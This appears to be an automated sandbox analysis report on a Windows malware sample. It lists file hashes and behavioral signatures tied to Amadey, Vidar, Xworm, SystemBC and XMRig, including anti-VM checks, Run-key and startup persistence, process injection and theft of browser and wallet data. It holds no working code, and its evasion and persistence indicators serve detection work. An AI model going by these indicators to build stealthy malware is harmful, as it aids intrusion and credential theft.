| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\ProgramData\EF742872A369CDF0.dat
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\ProgramData\18778BF760B0D867.dat
| MD5 | 6093b9b9effe107a1958b5e8775d196a |
| SHA1 | f86ede48007734aebe75f41954ea1ef64924b05e |
| SHA256 | a10b04d057393f5974c776ed253909cafcd014752a57da2971ae0dddfa889ab0 |
| SHA512 | 2d9c20a201655ffcce71bfafa71b79fe08eb8aa02b5666588302608f6a14126a5a1f4213a963eb528514e2ea2b17871c4c5f9b5ef89c1940c40c0718ec367a77 |
C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe
| MD5 | 7c169698effcdd45b7cbd763d28e87f5 |
| SHA1 | 4f9db666d66255cd7ca2b0973ff00eae8b155f7a |
| SHA256 | c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b |
| SHA512 | 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3 |
C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe
| MD5 | 2012699a5e85cd283323c324aa061bc7 |
| SHA1 | 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f |
| SHA256 | 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5 |
| SHA512 | 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683 |
C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe
| MD5 | e935a122d4c4e9c1b44368821a5154ff |
| SHA1 | c93e4b9fb9563cb04a9cd39c75220eaf6007f98f |
| SHA256 | 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4 |
| SHA512 | 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 3a323a53ef7554fc415585baabacc2cf |
| SHA1 | 9d6af00ea3c5e84c17321e022b395b22c7994c9a |
| SHA256 | 160e98106f6fea6b8b4c60ce2f6fab5c912b61e6afbf78f603c9a841769a9f07 |
| SHA512 | 778677921c66efa0987fbd47b84788b16dac424d3db3bf890fda91bd61dc8117401122e27f81e31a7a304f87ddeaf1bb2caf0d64689899f92ba5822d8e4926fa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\d41625c8-9be6-404d-b6d9-28e68e206bec
| MD5 | 89054adf1cdefc3a754853aece29d215 |
| SHA1 | f3ebd5f373909ebf6bedcfbf3e7be5bcf698fc48 |
| SHA256 | d68ccf6a24ff7e4a4beaf0caf061d957aa435864a71e93c9a0bba8658d5b0e8e |
| SHA512 | f559177de099bbbea03f3d91cad51bec9e1af27c859404536b7cde51006255b426063cc5b3d57ab5b468b3c72e1b90b57d45ee26ff8755b821bd793a73e742f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\8260db59-ce4a-4ec5-8fc7-a6923b96376e
| MD5 | be05a61ddcf57f2796b22e27d8ea9841 |
| SHA1 | 065c5fca85f8a682e0c9220386013e964a1c936a |
| SHA256 | 0d939c02e8e6871c311a3bf416b499c738809b15d642d5bea75bcb53f387acc2 |
| SHA512 | 1c4df25ae13b6f3be138b6c3f63f1ec22ae973d60c43b74c23549d0f7404b401446443306f2565073e826e73861f2ace265aace0837566771b69809e6352fc7f |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | af3dc27d55fc2649cb5325fca88f451d |
| SHA1 | 2f099ca412059d812b34fd2cb2d89329a154448a |
| SHA256 | 97e90c239700a709af25f61cb41ee30ec58ef5b8251d1df67133b2d4d3cf22fb |
| SHA512 | 8f861d3b547c0bcb90efa6ba52471f8181ba4aa88702cec20918c913b2a77568246caef1ad20bdc1583d0926be0d1913292d2cede549afc994dfbb6ffcfe6f23 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js
| MD5 | 317125259ae765765ee11cf30c473e32 |
| SHA1 | 50c861defa414557c6ae70abce9e932259cfc509 |
| SHA256 | 516c9e00bfe740ed3c1f0087e4f75d5bb4acc78fb3b196c91bd7d50976602632 |
| SHA512 | c4333f1da1c9968556d517ff4f94ec1911bf570f85161ffe543ee3768f1fb4b95fc0479380d9ec2d0cd51a8ea9414d0c55e5e500e12d64f743fd21530ffdeeba |
C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe
| MD5 | e787e8998f5306a754d625d7e29bbeb5 |
| SHA1 | 14e056dbf0b3991664910ee3a1d23a4bb2c0253d |
| SHA256 | 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d |
| SHA512 | 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6 |
memory/4084-1424-0x0000000000310000-0x0000000000782000-memory.dmp
memory/4084-1425-0x0000000000310000-0x0000000000782000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 22:58
Reported
2025-03-05 23:00
Platform
win10v2004-20250217-en
Max time kernel
138s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
SystemBC
Systembc family
Vidar
Vidar family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b1f64d5430.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\b1f64d5430.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\2CsAdXyX\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3384 set thread context of 2356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 3932 set thread context of 4584 | N/A | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe |
| PID 5068 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe |
| PID 5892 set thread context of 524 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe |
| PID 5496 set thread context of 5536 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 5432 set thread context of 5976 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
